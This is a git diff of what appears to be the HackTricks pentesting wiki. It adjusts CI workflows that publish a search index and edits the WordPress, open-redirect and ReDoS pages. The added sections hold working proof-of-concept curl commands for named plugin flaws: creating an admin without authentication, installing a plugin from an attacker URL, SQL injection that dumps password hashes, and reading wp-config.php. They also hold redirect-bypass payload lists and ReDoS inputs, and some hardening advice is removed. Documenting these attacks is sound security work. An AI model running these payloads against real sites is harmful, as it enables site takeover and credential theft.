diff --git a/.github/workflows/build_master.yml b/.github/workflows/build_master.yml index 94f5b5b94..f11da8c51 100644 --- a/.github/workflows/build_master.yml +++ b/.github/workflows/build_master.yml @@ -43,7 +43,7 @@ jobs: && sudo apt update \ && sudo apt install gh -y - - name: Publish search index release asset + - name: Push search index to hacktricks-searchindex repo shell: bash env: PAT_TOKEN: ${{ secrets.PAT_TOKEN }} @@ -51,43 +51,99 @@ jobs: set -euo pipefail ASSET="book/searchindex.js" - TAG="searchindex-en" - TITLE="Search Index (en)" + TARGET_REPO="HackTricks-wiki/hacktricks-searchindex" + FILENAME="searchindex-en.js" if [ ! -f "$ASSET" ]; then echo "Expected $ASSET to exist after build" >&2 exit 1 fi - TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}" + TOKEN="${PAT_TOKEN}" if [ -z "$TOKEN" ]; then - echo "No token available for GitHub CLI" >&2 + echo "No PAT_TOKEN available" >&2 exit 1 fi - export GH_TOKEN="$TOKEN" - # Delete the release if it exists - echo "Checking if release $TAG exists..." - if gh release view "$TAG" --repo "$GITHUB_REPOSITORY" >/dev/null 2>&1; then - echo "Release $TAG already exists, deleting it..." - gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag || { - echo "Failed to delete release, trying without cleanup-tag..." - gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" || { - echo "Warning: Could not delete existing release, will try to recreate..." - } - } - sleep 2 # Give GitHub API a moment to process the deletion + # Clone the searchindex repo + git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git /tmp/searchindex-repo + + cd /tmp/searchindex-repo + git config user.name "GitHub Actions" + git config user.email "github-actions@github.com" + + # Compress the searchindex file + cd "${GITHUB_WORKSPACE}" + gzip -9 -k -f "$ASSET" + + # Show compression stats + ORIGINAL_SIZE=$(wc -c < "$ASSET") + COMPRESSED_SIZE=$(wc -c < "${ASSET}.gz") + RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}") + echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)" + + # Copy the .gz version to the searchindex repo + cd /tmp/searchindex-repo + cp "${GITHUB_WORKSPACE}/${ASSET}.gz" "${FILENAME}.gz" + + # Stage the updated file + git add "${FILENAME}.gz" + + # Commit and push with retry logic + if git diff --staged --quiet; then + echo "No changes to commit" else - echo "Release $TAG does not exist, proceeding with creation..." + TIMESTAMP=$(date -u +"%Y-%m-%d %H:%M:%S UTC") + git commit -m "Update searchindex files - ${TIMESTAMP}" + + # Retry push up to 20 times with pull --rebase between attempts + MAX_RETRIES=20 + RETRY_COUNT=0 + while [ $RETRY_COUNT -lt $MAX_RETRIES ]; do + if git push origin master; then + echo "Successfully pushed on attempt $((RETRY_COUNT + 1))" + break + else + RETRY_COUNT=$((RETRY_COUNT + 1)) + if [ $RETRY_COUNT -lt $MAX_RETRIES ]; then + echo "Push failed, attempt $RETRY_COUNT/$MAX_RETRIES. Pulling and retrying..." + + # Try normal rebase first + if git pull --rebase origin master 2>&1 | tee /tmp/pull_output.txt; then + echo "Rebase successful, retrying push..." + else + # If rebase fails due to divergent histories (orphan branch reset), re-clone + if grep -q "unrelated histories\|refusing to merge\|fatal: invalid upstream\|couldn't find remote ref" /tmp/pull_output.txt; then + echo "Detected history rewrite, re-cloning repository..." 
+ cd /tmp + rm -rf searchindex-repo + git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git searchindex-repo + cd searchindex-repo + git config user.name "GitHub Actions" + git config user.email "github-actions@github.com" + + # Re-copy the .gz version + cp "${GITHUB_WORKSPACE}/${ASSET}.gz" "${FILENAME}.gz" + + git add "${FILENAME}.gz" + TIMESTAMP=$(date -u +"%Y-%m-%d %H:%M:%S UTC") + git commit -m "Update searchindex files - ${TIMESTAMP}" + echo "Re-cloned and re-committed, will retry push..." + else + echo "Rebase failed for unknown reason, retrying anyway..." + fi + fi + + sleep 1 + else + echo "Failed to push after $MAX_RETRIES attempts" + exit 1 + fi + fi + done fi - # Create new release (with force flag to overwrite if deletion failed) - gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY" || { - echo "Failed to create release, trying with force flag..." - gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag >/dev/null 2>&1 || true - sleep 2 - gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY" - } + echo "Successfully pushed searchindex files" # Login in AWs diff --git a/.github/workflows/translate_all.yml b/.github/workflows/translate_all.yml index b0444f9a7..59b1470c3 100644 --- a/.github/workflows/translate_all.yml +++ b/.github/workflows/translate_all.yml @@ -129,7 +129,7 @@ jobs: git pull MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1) - - name: Publish search index release asset + - name: Push search index to hacktricks-searchindex repo shell: bash env: PAT_TOKEN: ${{ secrets.PAT_TOKEN }} @@ -137,31 +137,93 @@ jobs: set -euo pipefail ASSET="book/searchindex.js" - TAG="searchindex-${BRANCH}" - TITLE="Search Index (${BRANCH})" + TARGET_REPO="HackTricks-wiki/hacktricks-searchindex" + FILENAME="searchindex-${BRANCH}.js" if [ ! -f "$ASSET" ]; then echo "Expected $ASSET to exist after build" >&2 exit 1 fi - TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}" + TOKEN="${PAT_TOKEN}" if [ -z "$TOKEN" ]; then - echo "No token available for GitHub CLI" >&2 + echo "No PAT_TOKEN available" >&2 exit 1 fi - export GH_TOKEN="$TOKEN" - # Delete the release if it exists - if gh release view "$TAG" >/dev/null 2>&1; then - echo "Release $TAG already exists, deleting it..." 
- gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" - fi + # Clone the searchindex repo + git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git /tmp/searchindex-repo - # Create new release - gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for $BRANCH" --repo "$GITHUB_REPOSITORY" + # Compress the searchindex file + gzip -9 -k -f "$ASSET" + + # Show compression stats + ORIGINAL_SIZE=$(wc -c < "$ASSET") + COMPRESSED_SIZE=$(wc -c < "${ASSET}.gz") + RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}") + echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)" + + # Copy ONLY the .gz version to the searchindex repo (no uncompressed .js) + cp "${ASSET}.gz" "/tmp/searchindex-repo/${FILENAME}.gz" + + # Commit and push with retry logic + cd /tmp/searchindex-repo + git config user.name "GitHub Actions" + git config user.email "github-actions@github.com" + git add "${FILENAME}.gz" + + if git diff --staged --quiet; then + echo "No changes to commit" + else + git commit -m "Update ${FILENAME} from hacktricks-cloud build" + + # Retry push up to 20 times with pull --rebase between attempts + MAX_RETRIES=20 + RETRY_COUNT=0 + while [ $RETRY_COUNT -lt $MAX_RETRIES ]; do + if git push origin master; then + echo "Successfully pushed on attempt $((RETRY_COUNT + 1))" + break + else + RETRY_COUNT=$((RETRY_COUNT + 1)) + if [ $RETRY_COUNT -lt $MAX_RETRIES ]; then + echo "Push failed, attempt $RETRY_COUNT/$MAX_RETRIES. Pulling and retrying..." + + # Try normal rebase first + if git pull --rebase origin master 2>&1 | tee /tmp/pull_output.txt; then + echo "Rebase successful, retrying push..." + else + # If rebase fails due to divergent histories (orphan branch reset), re-clone + if grep -q "unrelated histories\|refusing to merge\|fatal: invalid upstream\|couldn't find remote ref" /tmp/pull_output.txt; then + echo "Detected history rewrite, re-cloning repository..." + cd /tmp + rm -rf searchindex-repo + git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git searchindex-repo + cd searchindex-repo + git config user.name "GitHub Actions" + git config user.email "github-actions@github.com" + + # Re-copy ONLY the .gz version (no uncompressed .js) + cp "${ASSET}.gz" "${FILENAME}.gz" + + git add "${FILENAME}.gz" + git commit -m "Update ${FILENAME}.gz from hacktricks-cloud build" + echo "Re-cloned and re-committed, will retry push..." + else + echo "Rebase failed for unknown reason, retrying anyway..." + fi + fi + + sleep 1 + else + echo "Failed to push after $MAX_RETRIES attempts" + exit 1 + fi + fi + done + fi - # Login in AWs + # Login in AWS - name: Configure AWS credentials using OIDC uses: aws-actions/configure-aws-credentials@v3 with: diff --git a/src/network-services-pentesting/pentesting-web/wordpress.md b/src/network-services-pentesting/pentesting-web/wordpress.md index 7eea42ba0..cf9b546a2 100644 --- a/src/network-services-pentesting/pentesting-web/wordpress.md +++ b/src/network-services-pentesting/pentesting-web/wordpress.md @@ -447,15 +447,6 @@ Detection checklist - Review REST registrations for privileged callbacks that lack robust `permission_callback` checks and instead rely on request headers. - Look for usages of core user-management functions (`wp_insert_user`, `wp_create_user`) inside REST handlers that are gated only by header values. -Hardening - -- Never derive authentication or authorization from client-controlled headers. 
-- If a reverse proxy must inject identity, terminate trust at the proxy and strip inbound copies (e.g., `unset X-Wcpay-Platform-Checkout-User` at the edge), then pass a signed token and verify it server-side. -- For REST routes performing privileged actions, require `current_user_can()` checks and a strict `permission_callback` (do NOT use `__return_true`). -- Prefer first-party auth (cookies, application passwords, OAuth) over header β€œimpersonation”. - -References: see the links at the end of this page for a public case and broader analysis. - ### Unauthenticated Arbitrary File Deletion via wp_ajax_nopriv (Litho Theme <= 3.0) WordPress themes and plugins frequently expose AJAX handlers through the `wp_ajax_` and `wp_ajax_nopriv_` hooks. When the **_nopriv_** variant is used **the callback becomes reachable by unauthenticated visitors**, so any sensitive action must additionally implement: @@ -511,31 +502,6 @@ Other impactful targets include plugin/theme `.php` files (to break security plu * Concatenation of unsanitised user input into paths (look for `$_POST`, `$_GET`, `$_REQUEST`). * Absence of `check_ajax_referer()` and `current_user_can()`/`is_user_logged_in()`. -#### Hardening - -```php -function secure_remove_font_family() { - if ( ! is_user_logged_in() ) { - wp_send_json_error( 'forbidden', 403 ); - } - check_ajax_referer( 'litho_fonts_nonce' ); - - $fontfamily = sanitize_file_name( wp_unslash( $_POST['fontfamily'] ?? '' ) ); - $srcdir = trailingslashit( wp_upload_dir()['basedir'] ) . 'litho-fonts/' . $fontfamily; - - if ( ! str_starts_with( realpath( $srcdir ), realpath( wp_upload_dir()['basedir'] ) ) ) { - wp_send_json_error( 'invalid path', 400 ); - } - // … proceed … -} -add_action( 'wp_ajax_litho_remove_font_family_action_data', 'secure_remove_font_family' ); -// πŸ”’ NO wp_ajax_nopriv_ registration -``` - -> [!TIP] -> **Always** treat any write/delete operation on disk as privileged and double-check: -> β€’ Authentication β€’ Authorisation β€’ Nonce β€’ Input sanitisation β€’ Path containment (e.g. via `realpath()` plus `str_starts_with()`). - --- ### Privilege escalation via stale role restoration and missing authorization (ASE "View Admin as Role") @@ -565,12 +531,6 @@ Why it’s exploitable - If a user previously had higher privileges saved in `_asenha_view_admin_as_original_roles` and was downgraded, they can restore them by hitting the reset path. - In some deployments, any authenticated user could trigger a reset for another username still present in `viewing_admin_as_role_are` (broken authorization). -Attack prerequisites - -- Vulnerable plugin version with the feature enabled. -- Target account has a stale high-privilege role stored in user meta from earlier use. -- Any authenticated session; missing nonce/capability on the reset flow. - Exploitation (example) ```bash @@ -591,21 +551,6 @@ Detection checklist - Modify roles via `add_role()` / `remove_role()` without `current_user_can()` and `wp_verify_nonce()` / `check_admin_referer()`. - Authorize based on a plugin option array (e.g., `viewing_admin_as_role_are`) instead of the actor’s capabilities. -Hardening - -- Enforce capability checks on every state-changing branch (e.g., `current_user_can('manage_options')` or stricter). -- Require nonces for all role/permission mutations and verify them: `check_admin_referer()` / `wp_verify_nonce()`. -- Never trust request-supplied usernames; resolve the target user server-side based on the authenticated actor and explicit policy. 
-- Invalidate β€œoriginal roles” state on profile/role updates to avoid stale high-privilege restoration: - -```php -add_action( 'profile_update', function( $user_id ) { - delete_user_meta( $user_id, '_asenha_view_admin_as_original_roles' ); -}, 10, 1 ); -``` - -- Consider storing minimal state and using time-limited, capability-guarded tokens for temporary role switches. - --- ### Unauthenticated privilege escalation via cookie‑trusted user switching on public init (Service Finder β€œsf-booking”) @@ -852,6 +797,123 @@ Patched behaviour (Jobmonster 4.8.0) - Removed the insecure fallback from $_POST['id']; $user_email must originate from verified provider branches in switch($_POST['using']). +## Unauthenticated privilege escalation via REST token/key minting on predictable identity (OttoKit/SureTriggers ≀ 1.0.82) + +Some plugins expose REST endpoints that mint reusable β€œconnection keys” or tokens without verifying the caller’s capabilities. If the route authenticates only on a guessable attribute (e.g., username) and does not bind the key to a user/session with capability checks, any unauthenticated attacker can mint a key and invoke privileged actions (admin account creation, plugin actions β†’ RCE). + +- Vulnerable route (example): sure-triggers/v1/connection/create-wp-connection +- Flaw: accepts a username, issues a connection key without current_user_can() or a strict permission_callback +- Impact: full takeover by chaining the minted key to internal privileged actions + +PoC – mint a connection key and use it + +```bash +# 1) Obtain key (unauthenticated). Exact payload varies per plugin +curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/connection/create-wp-connection" \ + -H 'Content-Type: application/json' \ + --data '{"username":"admin"}' +# β†’ {"key":"", ...} + +# 2) Call privileged plugin action using the minted key (namespace/route vary per plugin) +curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/users" \ + -H 'Content-Type: application/json' \ + -H 'X-Connection-Key: ' \ + --data '{"username":"pwn","email":"p@t.ld","password":"p@ss","role":"administrator"}' +``` + +Why it’s exploitable +- Sensitive REST route protected only by low-entropy identity proof (username) or missing permission_callback +- No capability enforcement; minted key is accepted as a universal bypass + +Detection checklist +- Grep plugin code for register_rest_route(..., [ 'permission_callback' => '__return_true' ]) +- Any route that issues tokens/keys based on request-supplied identity (username/email) without tying to an authenticated user or capability +- Look for subsequent routes that accept the minted token/key without server-side capability checks + +Hardening +- For any privileged REST route: require permission_callback that enforces current_user_can() for the required capability +- Do not mint long-lived keys from client-supplied identity; if needed, issue short-lived, user-bound tokens post-authentication and recheck capabilities on use +- Validate the caller’s user context (wp_set_current_user is not sufficient alone) and reject requests where !is_user_logged_in() || !current_user_can() + +--- + +## Nonce gate misuse β†’ unauthenticated arbitrary plugin installation (FunnelKit Automations ≀ 3.5.3) + +Nonces prevent CSRF, not authorization. 
If code treats a nonce pass as a green light and then skips capability checks for privileged operations (e.g., install/activate plugins), unauthenticated attackers can meet a weak nonce requirement and reach RCE by installing a backdoored or vulnerable plugin. + +- Vulnerable path: plugin/install_and_activate +- Flaw: weak nonce hash check; no current_user_can('install_plugins'|'activate_plugins') once nonce β€œpasses” +- Impact: full compromise via arbitrary plugin install/activation + +PoC (shape depends on plugin; illustrative only) + +```bash +curl -i -s -X POST https://victim.tld/wp-json//plugin/install_and_activate \ + -H 'Content-Type: application/json' \ + --data '{"_nonce":"","slug":"hello-dolly","source":"https://attacker.tld/mal.zip"}' +``` + +Detection checklist +- REST/AJAX handlers that modify plugins/themes with only wp_verify_nonce()/check_admin_referer() and no capability check +- Any code path that sets $skip_caps = true after nonce validation + +Hardening +- Always treat nonces as CSRF tokens only; enforce capability checks regardless of nonce state +- Require current_user_can('install_plugins') and current_user_can('activate_plugins') before reaching installer code +- Reject unauthenticated access; avoid exposing nopriv AJAX actions for privileged flows + +--- + +## Unauthenticated SQLi via s search parameter in depicter-* actions (Depicter Slider ≀ 3.6.1) + +Multiple depicter-* actions consumed the s (search) parameter and concatenated it into SQL queries without parameterization. + +- Parameter: s (search) +- Flaw: direct string concatenation in WHERE/LIKE clauses; no prepared statements/sanitization +- Impact: database exfiltration (users, hashes), lateral movement + +PoC + +```bash +# Replace action with the affected depicter-* handler on the target +curl -G "https://victim.tld/wp-admin/admin-ajax.php" \ + --data-urlencode 'action=depicter_search' \ + --data-urlencode "s=' UNION SELECT user_login,user_pass FROM wp_users-- -" +``` + +Detection checklist +- Grep for depicter-* action handlers and direct use of $_GET['s'] or $_POST['s'] in SQL +- Review custom queries passed to $wpdb->get_results()/query() concatenating s + +Hardening +- Always use $wpdb->prepare() or wpdb placeholders; reject unexpected metacharacters server-side +- Add a strict allowlist for s and normalize to expected charset/length + +--- + +## Unauthenticated Local File Inclusion via unvalidated template/file path (Kubio AI Page Builder ≀ 2.5.1) + +Accepting attacker-controlled paths in a template parameter without normalization/containment allows reading arbitrary local files, and sometimes code execution if includable PHP/log files are pulled into runtime. 
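+
+As a minimal sketch of the root cause (Python for brevity – the real plugin is PHP, and the directory and function names here are illustrative, not from the advisory), compare a naive path join with the realpath-based containment recommended in the hardening notes of this section:
+
+```python
+import os
+
+TEMPLATE_DIR = "/var/www/html/wp-content/themes/site/templates"  # illustrative base dir
+
+def unsafe_resolve(template_param: str) -> str:
+    # Naive concatenation: "../" sequences walk out of TEMPLATE_DIR
+    return os.path.join(TEMPLATE_DIR, template_param)
+
+def safe_resolve(template_param: str) -> str:
+    # Resolve ".." and symlinks first, then enforce containment in the allowed base
+    candidate = os.path.realpath(os.path.join(TEMPLATE_DIR, template_param))
+    base = os.path.realpath(TEMPLATE_DIR)
+    if not candidate.startswith(base + os.sep):
+        raise ValueError("path traversal attempt")
+    return candidate
+
+payload = "../../../../wp-config.php"
+print(unsafe_resolve(payload))   # resolves outside the templates directory
+try:
+    safe_resolve(payload)
+except ValueError as err:
+    print("blocked:", err)       # traversal rejected by containment check
+```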
+ +- Parameter: __kubio-site-edit-iframe-classic-template +- Flaw: no normalization/allowlisting; traversal permitted +- Impact: secret disclosure (wp-config.php), potential RCE in specific environments (log poisoning, includable PHP) + +PoC – read wp-config.php + +```bash +curl -i "https://victim.tld/?__kubio-site-edit-iframe-classic-template=../../../../wp-config.php" +``` + +Detection checklist +- Any handler concatenating request paths into include()/require()/read sinks without realpath() containment +- Look for traversal patterns (../) reaching outside the intended templates directory + +Hardening +- Enforce allowlisted templates; resolve with realpath() and require str_starts_with(realpath(file), realpath(allowed_base)) +- Normalize input; reject traversal sequences and absolute paths; use sanitize_file_name() only for filenames (not full paths) + + ## References - [Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/) @@ -863,7 +925,11 @@ Patched behaviour (Jobmonster 4.8.0) - [Hackers exploiting critical WordPress WooCommerce Payments bug](https://www.bleepingcomputer.com/news/security/hackers-exploiting-critical-wordpress-woocommerce-payments-bug/) - [Unpatched Privilege Escalation in Service Finder Bookings Plugin](https://patchstack.com/articles/unpatched-privilege-escalation-in-service-finder-bookings-plugin/) - [Service Finder Bookings privilege escalation – Patchstack DB entry](https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-booking-6-0-privilege-escalation-vulnerability) - - [Unauthenticated Broken Authentication Vulnerability in WordPress Jobmonster Theme](https://patchstack.com/articles/unauthenticated-broken-authentication-vulnerability-in-wordpress-jobmonster-theme/) +- [Q3 2025’s most exploited WordPress vulnerabilities and how RapidMitigate blocked them](https://patchstack.com/articles/q3-2025s-most-exploited-wordpress-vulnerabilities-and-how-patchstacks-rapidmitigate-blocked-them/) +- [OttoKit (SureTriggers) ≀ 1.0.82 – Privilege Escalation (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/suretriggers/vulnerability/wordpress-suretriggers-1-0-82-privilege-escalation-vulnerability) +- [FunnelKit Automations ≀ 3.5.3 – Unauthenticated arbitrary plugin installation (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/wp-marketing-automations/vulnerability/wordpress-recover-woocommerce-cart-abandonment-newsletter-email-marketing-marketing-automation-by-funnelkit-plugin-3-5-3-missing-authorization-to-unauthenticated-arbitrary-plugin-installation-vulnerability) +- [Depicter Slider ≀ 3.6.1 – Unauthenticated SQLi via s parameter (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/depicter/vulnerability/wordpress-depicter-slider-plugin-3-6-1-unauthenticated-sql-injection-via-s-parameter-vulnerability) +- [Kubio AI Page Builder ≀ 2.5.1 – Unauthenticated LFI (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/kubio/vulnerability/wordpress-kubio-ai-page-builder-plugin-2-5-1-unauthenticated-local-file-inclusion-vulnerability) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/open-redirect.md b/src/pentesting-web/open-redirect.md index 2cbc9d4e6..c97bf611c 100644 --- a/src/pentesting-web/open-redirect.md +++ b/src/pentesting-web/open-redirect.md @@ -7,12 +7,23 @@ ### Redirect to localhost or arbitrary domains +- If the app β€œallows 
only internal/whitelisted hosts”, try alternative host notations to hit loopback or internal ranges via the redirect target: + - IPv4 loopback variants: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal) + - IPv6 loopback variants: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1] + - Trailing dot and casing: localhost., LOCALHOST, 127.0.0.1. + - Wildcard DNS that resolves to loopback: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me. These are useful when only β€œsubdomains of X” are allowed but host resolution still points to 127.0.0.1. +- Network-path references often bypass naive validators that prepend a scheme or only check prefixes: + - //attacker.tld β†’ interpreted as scheme-relative and navigates off-site with the current scheme. +- Userinfo tricks defeat contains/startswith checks against trusted hosts: + - https://trusted.tld@attacker.tld/ β†’ browser navigates to attacker.tld but simple string checks β€œsee” trusted.tld. +- Backslash parsing confusion between frameworks/browsers: + - https://trusted.tld\@attacker.tld β†’ some backends treat β€œ\” as a path char and pass validation; browsers normalize to β€œ/” and interpret trusted.tld as userinfo, sending users to attacker.tld. This also appears in Node/PHP URL-parser mismatches. {{#ref}} ssrf-server-side-request-forgery/url-format-bypass.md {{#endref}} -### Open Redirect to XSS +### Modern open-redirect to XSS pivots ```bash #Basic payload, javascript code is executed after "javascript:" @@ -60,6 +71,34 @@ javascript://whitelisted.com?%a0alert%281%29 ";alert(0);// ``` +
+**More modern URL-based bypass payloads**
+
+```text
+# Scheme-relative (current scheme is reused)
+//evil.example
+
+# Credentials (userinfo) trick
+https://trusted.example@evil.example/
+
+# Backslash confusion (server validates, browser normalizes)
+https://trusted.example\@evil.example/
+
+# Schemeless with whitespace/control chars
+evil.example%00
+%09//evil.example
+
+# Prefix/suffix matching flaws
+https://trusted.example.evil.example/
+https://evil.example/trusted.example
+
+# When only path is accepted, try breaking absolute URL detection
+/\\evil.example
+/..//evil.example
+```
+
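+Most of these payloads work because the validator compares raw strings instead of parsed URL components. A minimal sketch (Python, with hypothetical check functions – not any specific framework's API) of which of the above slip past naive prefix/substring checks versus an exact hostname comparison after parsing:
+
+```python
+from urllib.parse import urlparse
+
+TRUSTED_HOST = "trusted.example"
+
+def naive_check(url: str) -> bool:
+    # Flawed patterns seen in the wild: raw-string prefix / substring matching
+    return url.startswith("https://" + TRUSTED_HOST) or TRUSTED_HOST in url
+
+def parsed_check(url: str) -> bool:
+    # Compare the parsed hostname exactly; userinfo and lookalike subdomains no longer fool it
+    return (urlparse(url).hostname or "") == TRUSTED_HOST
+
+payloads = [
+    "https://trusted.example@evil.example/",   # userinfo trick
+    "https://trusted.example.evil.example/",   # prefix-matching flaw
+    "https://evil.example/trusted.example",    # substring flaw
+    "//evil.example",                          # scheme-relative; defeats filters that only block absolute http(s):// URLs
+]
+
+for p in payloads:
+    print(f"{p:45} naive={naive_check(p)} parsed={parsed_check(p)}")
+```
+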
+ ## Open Redirect uploading svg files ```html @@ -173,18 +212,78 @@ exit; ?> ``` +## Hunting and exploitation workflow (practical) + +- Single URL check with curl: + +```bash +curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:" +``` + +- Discover and fuzz likely parameters at scale: + +
+```bash
+# 1) Gather historical URLs, keep those with common redirect params
+cat domains.txt \
+  | gau --o urls.txt          # or: waybackurls / katana / hakrawler
+
+# 2) Grep common redirect parameters and normalize the list
+rg -NI "(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)" urls.txt \
+  | sed 's/\r$//' | sort -u > candidates.txt
+
+# 3) Use OpenRedireX to fuzz with a payload corpus
+cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt
+
+# 4) Manually verify interesting hits (3xx responses / Location headers)
+grep -iE "30[1237]|location:" results.txt
+```
+
+ +- Don’t forget client-side sinks in SPAs: look for window.location/assign/replace and framework helpers that read query/hash and redirect. + +- Frameworks often introduce footguns when redirect destinations are derived from untrusted input (query params, Referer, cookies). See Next.js notes about redirects and avoid dynamic destinations derived from user input. + +{{#ref}} +../network-services-pentesting/pentesting-web/nextjs.md +{{#endref}} + +- OAuth/OIDC flows: abusing open redirectors frequently escalates to account takeover by leaking authorization codes/tokens. See dedicated guide: + +{{#ref}} +./oauth-to-account-takeover.md +{{#endref}} + +- Server responses that implement redirects without Location (meta refresh/JavaScript) are still exploitable for phishing and can sometimes be chained. Grep for: + +```html + + +``` + ## Tools - [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer) +- OpenRedireX – fuzzer for detecting open redirects. Example: -## Resources +```bash +# Install +git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh -- In [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) you can find fuzzing lists. +# Fuzz a list of candidate URLs (use FUZZ as placeholder) +cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50 +``` + +## References + +- In https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect you can find fuzzing lists. - [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html) - [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads) - [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a) - +- PortSwigger Web Security Academy – DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection +- OpenRedireX – A fuzzer for detecting open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX {{#include ../banners/hacktricks-training.md}} - - diff --git a/src/pentesting-web/regular-expression-denial-of-service-redos.md b/src/pentesting-web/regular-expression-denial-of-service-redos.md index 21675cc90..15bccf507 100644 --- a/src/pentesting-web/regular-expression-denial-of-service-redos.md +++ b/src/pentesting-web/regular-expression-denial-of-service-redos.md @@ -8,7 +8,12 @@ A **Regular Expression Denial of Service (ReDoS)** happens when someone takes ad ## The Problematic Regex NaΓ―ve Algorithm -**Check the details in [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-\_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)** +**Check the details in [https://owasp.org/www-community/attacks/Regular*expression_Denial_of_Service*-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)** + +### Engine behavior and exploitability + +- Most popular engines (PCRE, Java `java.util.regex`, Python `re`, JavaScript `RegExp`) use a **backtracking** VM. Crafted inputs that create many overlapping ways to match a subpattern force exponential or high-polynomial backtracking. 
+- Some engines/libraries are designed to be **ReDoS-resilient** by construction (no backtracking), e.g. **RE2** and ports based on finite automata that provide worst‑case linear time; using them for untrusted input removes the backtracking DoS primitive. See the references at the end for details. ## Evil Regexes @@ -18,10 +23,36 @@ An evil regular expression pattern is that one that can **get stuck on crafted i - ([a-zA-Z]+)\* - (a|aa)+ - (a|a?)+ -- (.\*a){x} for x > 10 +- (.*a){x} for x > 10 All those are vulnerable to the input `aaaaaaaaaaaaaaaaaaaaaaaa!`. +### Practical recipe to build PoCs + +Most catastrophic cases follow this shape: + +- Prefix that gets you into the vulnerable subpattern (optional). +- Long run of a character that causes ambiguous matches inside nested/overlapping quantifiers (e.g., many `a`, `_`, or spaces). +- A final character that forces overall failure so the engine must backtrack through all possibilities (often a character that won’t match the last token, like `!`). + +Minimal examples: + +- `(a+)+$` vs input `"a"*N + "!"` +- `\w*_*\w*$` vs input `"v" + "_"*N + "!"` + +Increase N and observe super‑linear growth. + +#### Quick timing harness (Python) + +```python +import re, time +pat = re.compile(r'(\w*_)\w*$') +for n in [2**k for k in range(8, 15)]: + s = 'v' + '_'*n + '!' + t0=time.time(); pat.search(s); dt=time.time()-t0 + print(n, f"{dt:.3f}s") +``` + ## ReDoS Payloads ### String Exfiltration via ReDoS @@ -30,7 +61,7 @@ In a CTF (or bug bounty) maybe you **control the Regex a sensitive information ( - In [**this post**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) you can find this ReDoS rule: `^(?=)((.*)*)*salt$` - Example: `^(?=HTB{sOmE_flΒ§NΒ§)((.*)*)*salt$` -- In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) you can find this one:`(((((((.*)*)*)*)*)*)*)!` +- In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html) you can find this one:`(((((((.*)*)*)*)*)*)*)!` - In [**this writeup**](https://ctftime.org/writeup/25869) he used: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$` ### ReDoS Controlling Input and Regex @@ -67,19 +98,35 @@ Regexp (a+)*$ took 723 milliseconds. */ ``` +### Language/engine notes for attackers + +- JavaScript (browser/Node): Built‑in 